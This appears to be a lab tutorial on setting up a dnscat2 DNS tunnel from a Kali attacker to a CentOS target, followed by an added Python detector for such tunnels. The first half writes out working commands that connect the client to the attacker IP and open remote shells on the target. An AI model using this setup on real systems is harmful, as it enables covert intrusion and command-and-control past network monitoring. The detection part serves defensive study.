I. dnscat2
Attacking machine (Kali): 192.168.137.134
Target machine (CentOS): 192.168.137.130
1. Download and install dnscat2 on the attacking machine (the Ruby server lives under server/)
$ sudo git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ sudo gem install bundler
$ bundle install
2. On the attacking machine, start the server: ruby ./dnscat2.rb --secret=123456
(No --dns domain is given, so the server only accepts direct queries to UDP/53; the banner itself warns that this mode is less stealthy than running behind a delegated domain.)
┌──(kali㉿kali)-[/home/dnscat2/server]
└─$ ruby ./dnscat2.rb --secret=123456
New window created: 0
New window created: crypto-debug

Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted and authenticated
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = n/a]...

It looks like you didn't give me any domains to recognize!
That's cool, though, you can still use direct queries,
although those are less stealthy.

To talk directly to the server without a domain name, run:
  ./dnscat --dns server=x.x.x.x,port=53 --secret=123456

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.

dnscat2>
3. Download and build the dnscat2 client on the target (the C client lives under client/)
]# git clone https://github.com/iagox86/dnscat2.git
]# cd dnscat2/client/
]# make
4. On the target, connect the client directly to the attacking machine: ./dnscat --dns server=192.168.137.134,port=53 --secret=123456
General form: ./dnscat --dns server=<attacker IP>,port=<attacker port, 53 by default> --secret=<pre-shared secret>
The --secret value must match the one the server was started with; the server's security policy ("all connections must be encrypted and authenticated") rejects clients that do not present it.
[root@localhost client]# ./dnscat --dns server=192.168.137.134,port=53 --secret=123456
Creating DNS driver:
 domain = (null)
 host   = 0.0.0.0
 port   = 53
 type   = TXT,CNAME,MX
 server = 192.168.137.134

** Peer verified with pre-shared secret!

Session established!
5. Drive the DNS tunnel from the attacking machine
Every connected client shows up as a "command" window; the "sh" windows listed below are shell sessions spawned from that command session (window 1) with dnscat2's shell command, and window -i attaches to one of them. The ifconfig output at the end (inet 192.168.137.130 on ens33) confirms the shell is running on the target.
dnscat2> help
Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows
dnscat2> windows
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
  dns1 :: DNS Driver running on 0.0.0.0:53 domains = [*]
  1 :: command (localhost.localdomain) [encrypted and verified]
    2 :: sh (localhost.localdomain) [encrypted and verified] [*]
    3 :: sh (localhost.localdomain) [encrypted and verified] [*]
    4 :: sh (localhost.localdomain) [encrypted and verified] [*]
    5 :: sh (localhost.localdomain) [encrypted and verified] [*]
dnscat2> window -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

New window created: 3
New window created: 4
New window created: 5
sh (localhost.localdomain) 2> ifconfig
sh (localhost.localdomain) 2> ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.137.130  netmask 255.255.255.0  broadcast 192.168.137.255
        inet6 fe80::a751:4e08:5cfc:30d5  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:a9:45:54  txqueuelen 1000  (Ethernet)
        RX packets 52871  bytes 44202390 (42.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 23252  bytes 4082125 (3.8 MiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 276  bytes 24689 (24.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 276  bytes 24689 (24.1 KiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

virbr0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 192.168.122.1  netmask 255.255.255.0  broadcast 192.168.122.255
        ether 52:54:00:27:81:06  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
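The setup above leaks three things a defender can key on: the client sends DNS straight to an attacker IP on UDP/53 rather than to the site resolver (the "direct queries ... less stealthy" warning), it uses TXT/CNAME/MX records (the client's "type = TXT,CNAME,MX"), and it carries its payload as long hexadecimal labels in the query name. The following is an added example, not code from the original page or from the dnscat2 project: a small Python heuristic that scores per-(source, destination) DNS query logs on those three signals. The log format ("src dst qtype qname"), the resolver address 192.168.137.1 and the sample lines are all constructed for the example; the hex labels only mimic the statistical shape of tunnel traffic, not dnscat2's exact label layout.

```python
"""Heuristic detector for dnscat2-style DNS tunnelling (added example).

Signals used, matching what the tutorial's own setup exposes on the wire:
  * queries sent directly to a host that is not the site resolver
  * payload-capable record types (TXT, CNAME, MX)
  * long, high-entropy hexadecimal labels inside the query name
"""
import math
import re
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# ASSUMED for the example: the site's legitimate recursive resolver(s).
KNOWN_RESOLVERS = {"192.168.137.1"}

PAYLOAD_QTYPES = {"TXT", "CNAME", "MX"}
HEX_LABEL = re.compile(r"^[0-9a-f]{16,63}$")  # DNS labels are at most 63 octets

# Constructed sample log (not a real capture). Format: "src dst qtype qname".
SAMPLE_LOG = """\
192.168.137.130 192.168.137.1 A mirrorlist.centos.org
192.168.137.130 192.168.137.1 AAAA mirrorlist.centos.org
192.168.137.130 192.168.137.1 A www.kali.org
192.168.137.130 192.168.137.134 TXT dnscat.7f0c2a91d3e84b65f1a0c9d2e7b3f48a
192.168.137.130 192.168.137.134 CNAME dnscat.20d9e4a17c3b5f08e6a2d1c9b74f03e5d8a6c1b2f9e0d3a74c5b6e1f8d2a90
192.168.137.130 192.168.137.134 MX dnscat.c41ea0f5d7b8392e6a1f0d4c8b2e7a93.5f6d1c0e2b7a4d8f
192.168.137.130 192.168.137.134 TXT dnscat.e83b1d9f2a46c70b5d3e9f1a8c2b6d04
192.168.137.1 8.8.8.8 A www.kali.org
"""


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character (a pure-hex string tops out at 4.0)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def query_indicators(src: str, dst: str, qtype: str, qname: str) -> List[str]:
    """Return the list of tunnelling indicators present in one query."""
    reasons: List[str] = []
    if dst not in KNOWN_RESOLVERS:
        reasons.append("direct query to non-resolver")
    if qtype.upper() in PAYLOAD_QTYPES:
        reasons.append(f"payload-capable qtype {qtype.upper()}")
    labels = qname.lower().rstrip(".").split(".")
    hex_labels = [lab for lab in labels if HEX_LABEL.match(lab)]
    # Real hostnames rarely contain 16+ hex chars; encoded payload always does.
    if hex_labels and max(shannon_entropy(lab) for lab in hex_labels) >= 3.0:
        reasons.append("high-entropy hex label")
    return reasons


def detect(log_text: str, min_queries: int = 3, min_indicators: int = 2) -> Dict[Tuple[str, str], dict]:
    """Group queries per (src, dst) and flag pairs with repeated suspicious queries.

    A single odd query is noise; a tunnel produces many in a row to one server,
    which is why the threshold is on the pair's count, not on one line.
    """
    stats: Dict[Tuple[str, str], dict] = defaultdict(
        lambda: {"queries": 0, "suspicious": 0, "reasons": set()}
    )
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines instead of crashing the pass
        src, dst, qtype, qname = parts
        rec = stats[(src, dst)]
        rec["queries"] += 1
        reasons = query_indicators(src, dst, qtype, qname)
        if len(reasons) >= min_indicators:
            rec["suspicious"] += 1
            rec["reasons"].update(reasons)
    return {pair: rec for pair, rec in stats.items() if rec["suspicious"] >= min_queries}


if __name__ == "__main__":
    for (src, dst), rec in detect(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: {rec['suspicious']}/{rec['queries']} suspicious; "
              + ", ".join(sorted(rec["reasons"])))
```

Tuning note: in the direct-query mode shown on this page the "non-resolver" signal alone is almost decisive, because an internal host should never speak DNS to anything but the resolver. When dnscat2 is run behind a delegated domain instead, queries go through the legitimate resolver and only the record-type and hex-label signals remain, so the per-pair count threshold is what keeps the detector from firing on a single CDN-style hostname.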